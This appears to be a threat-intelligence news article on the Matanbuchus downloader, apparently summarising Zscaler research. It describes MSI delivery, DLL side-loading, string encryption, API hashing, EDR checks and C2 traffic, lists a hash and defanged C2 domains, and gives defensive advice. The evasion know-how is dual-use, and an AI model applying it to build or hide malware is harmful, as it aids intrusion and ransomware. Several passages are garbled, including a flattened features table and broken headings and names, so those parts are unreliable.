The Matanbuchus downloader malware constantly modifies its components to evade machine learning and antivirus detection, according to researchers. Microsoft Installer (MSI) files are now used by threat actors to distribute the downloader; some samples have zero VirusTotal detections. The malware's continued development as a Malware-as-a-Service (MaaS) tool connected to ransomware operations is highlighted in this update.

According to ZScaler, Matanbuchus operators regularly alter code segments, strings, and payloads to evade signature-based antivirus scans. They use ChaCha20 to encrypt strings, insert junk code, and use MurmurHash to hash Windows APIs. Sandbox analysis is frustrated by short timeouts caused by busy loops that delay execution. Defenders are forced to rely on behavior monitoring as a result of these modifications, which render static detection unreliable.

By side-loading trustworthy executables like HRUpdate.exe, the most recent samples use MSI files hosted on attacker-controlled domains to drop the downloader DLL. At first, the hash 6a1398395f5434aa39c5074833698b0a85967eb01d76273ef8762fb149136382 avoided all AV engines. After that, the downloader uses Protocol Buffers encrypted with ChaCha20 to retrieve the main module via HTTPS.

Technical Failure Matanbuchus is divided into two heavily obfuscated modules: the downloader and the main module. Before C2 check-in, the downloader collects system information such as hostname, OS version, domain, and security tools. It finds EDR products like Symantec (ccsvchst.exe), BitDefender (bdagent.exe), and ESET (ekrn.exe). Post requests containing base64-encoded, ChaCha20-encrypted JSON or Protobufs conceal C2 communication.

Shellcode injection, PowerShell/CMD shells, EXE/DLL/MSI execution, and process hollowing via msiexec.exe are all supported by commands. https://nady[. ]io/check/robot.aspx is a new C2 example that verifies operational infrastructure.

Part Important Features Evasion Techniques: payload fetch, junk code, API hashing, downloader system reconnaissance, and busy loops DLL side-loading, C2 polling ChaCha20 encryption, Protobufs MSI Delivery Zero VT detections, and Main Module Persistence through scheduled tasks Actual file impersonation Impact and Attack Chain Social engineering through QuickAssist or Teams calls pretending to be IT support is frequently the first step in gaining initial access. Attackers cause Notepad++ updater side-loading by tricking users into opening MSI or ZIP archives. After infection, Matanbuchus uses RATs like NetSupport or stealers like Rhadamanthys, opening the door for ransomware.

With tasks like "Update Tracker Task" for persistence, Zscaler connects these intrusions to manual ransomware preparation. WQL queries, indirect syscalls, and enhanced EDR evasion are added in version 3.0. Since 2020, campaigns have evolved into targeted operations, with targets spanning enterprises.

Block known C2s like nady[. ]io, mechiraz[. ]com, and gpa-cro[.

]com at firewalls. Turn on behavior detection for ChaCha20 traffic, unusual usage of msiexec.exe, and DLL side-loading. QuickAssist exploits should be patched, and users should be trained to avoid phony IT calls. Since signatures are vulnerable to modular changes, use EDR in conjunction with ML to identify anomalies.

It is identified as Win32 by Zscaler.backdoor.Matanbuchus; keep an eye out for API hashing and scheduled tasks. Look for IOCs in logs, such as the VT hash and MSI droppers.